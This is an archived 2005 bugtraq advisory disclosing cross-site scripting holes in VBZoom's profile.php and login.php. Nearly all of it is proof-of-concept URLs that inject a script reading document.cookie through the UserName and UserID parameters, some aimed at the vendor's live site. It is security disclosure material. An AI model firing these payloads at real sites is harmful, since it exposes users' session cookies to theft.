[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: VBZoom Cross Site Scripting Vulnerabilities
From: almaster () hotmail ! com
Date: 2005-07-29 11:38:35
Message-ID: 20050729113835.24904.qmail () securityfocus ! com
[Download RAW message or body]
Hi All.
VBzoom
PROPLEM >>>THERE IS Cross site scripting IN FILE NAMED profile.php & login.php
EXPLIOT >>> http://www.victim.com/vbzoom/profile.php?UserID=1&UserName=<br><script>alert(document.cookie);</script>
EXPLIOT >>> http://Victim.com/vbzoom/login.php?UserID='<br><script>alert(document.cookie);</script>
EXAMPLE >>>http://www.vbzoom.com/vz/profile.php?UserID=1&UserName=<br><script>alert(document.cookie);</script>
EXAMPLE >>>http://www.vbzoom.com/vz/login.php?UserID='<br><script>alert(document.cookie);</script>
DISCOVERED BY >> aLMaSTeR [at] HotMail [dot] com
GREETS >>> FOR S4a.cc
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic